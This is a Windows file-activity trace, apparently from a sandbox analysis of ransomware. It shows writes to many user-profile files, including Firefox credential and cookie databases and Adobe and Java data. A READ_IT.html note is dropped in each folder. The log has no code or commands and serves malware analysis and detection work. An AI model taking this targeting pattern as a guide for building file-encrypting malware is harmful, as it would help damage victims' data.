Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\addons.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\cert8.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\compatibility.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\content-prefs.sqlite	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\cookies.sqlite	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\downloads.sqlite	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\extensions.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\extensions.sqlite	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\healthreport.sqlite	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\key3.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\localstore.rdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\marionette.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\mimeTypes.rdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\parent.lock	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\permissions.sqlite	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\places.sqlite	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\pluginreg.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\prefs.js	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\search.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\secmod.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\sessionstore.bak	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\sessionstore.js	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\signons.sqlite	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\times.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\urlclassifierkey3.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\webappsstore.sqlite	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\webapps\webapps.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\webapps\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\indexedDB\moz-safe-about+home\.metadata	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\indexedDB\moz-safe-about+home\idb\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\bookmarkbackups\bookmarks-2017-06-23_5.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\bookmarkbackups\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Crash Reports\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Adobe\Acrobat\10.0\Security\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.js	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Sun\Java\jre1.7.0_60\Data1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Sun\Java\jre1.7.0_60\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Sun\Java\jre1.7.0_60\jre1.7.0_60.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Sun\Java\Deployment\deployment.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Sun\Java\Deployment\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Sun\Java\Deployment\security\baseline.versions	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Sun\Java\Deployment\security\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Sun\Java\Deployment\security\blacklist.dynamic	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Sun\Java\Deployment\security\blacklisted.certs	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Sun\Java\Deployment\security\update.timestamp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Sun\Java\AU\au.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Sun\Java\AU\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Sun\Java\AU\au.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Adobe\Acrobat\10.0\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\LocalLow\Adobe\Acrobat\10.0\ReaderMessages	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\GDIPFONTCACHEV1.DAT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\IconCache.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\2MhJfwFuDN3-e.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\2WBQ.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\328eb3bb-3513-4376-ad0b-51f56067bb1d.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\42234357-29bc-472f-be1a-21a7f646755a.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\4oYKxbiPGc0ml8LCl.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\6mAClKPTOKVQApV-Cql.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\AdobeARM.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\AdobeARM_NotLocked.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\ASPNETSetup_00000.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\ASPNETSetup_00001.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\ASPNETSetup_00002.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\ASPNETSetup_00003.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\ASPNETSetup_00004.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\ASPNETSetup_00005.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\AUCHECK_PARSER.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\BHlM4unK27DZ9.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\BoIplhK0r.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst2635.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst28B4.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst2960.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst2F3A.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst4105.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst423D.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst4558.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst47F7.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst531E.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst5511.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst5994.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst5CBF.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst7953.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst7F0E.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst7F4C.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\chrome_installer.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\CVRC37D.tmp.cvr	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\CVRC503.tmp.cvr	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_depcheck_NETFX_EXP_35.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_dotnetfx35error.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_dotnetfx35install.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_dotNetFx40_Full_x86_x64_decompression_log.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_dotnetfx45_full_x86_x64_decompression_log.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_NDP46-KB3045557-x86-x64-AllOS-ENU_decompression_log.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_SetupUtility.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredistMSI3A7F.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredistMSI3AC0.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredistUI3A7F.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredistUI3AC0.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_amd64_20170623160254.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_amd64_20170623160254_0_vcRuntimeMinimum_x64.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_amd64_20170623160254_1_vcRuntimeAdditional_x64.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_amd64_20170623160359.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_amd64_20170623160359_0_vcRuntimeMinimum_x64.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_amd64_20170623160359_1_vcRuntimeAdditional_x64.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_amd64_20170623160506.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_amd64_20170623160506_000_vcRuntimeMinimum_x64.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_amd64_20170623160506_001_vcRuntimeAdditional_x64.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_amd64_20170712115847.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_amd64_20170712115847_000_vcRuntimeMinimum_x64.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\dd_vcredist_amd64_20170712115847_001_vcRuntimeAdditional_x64.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
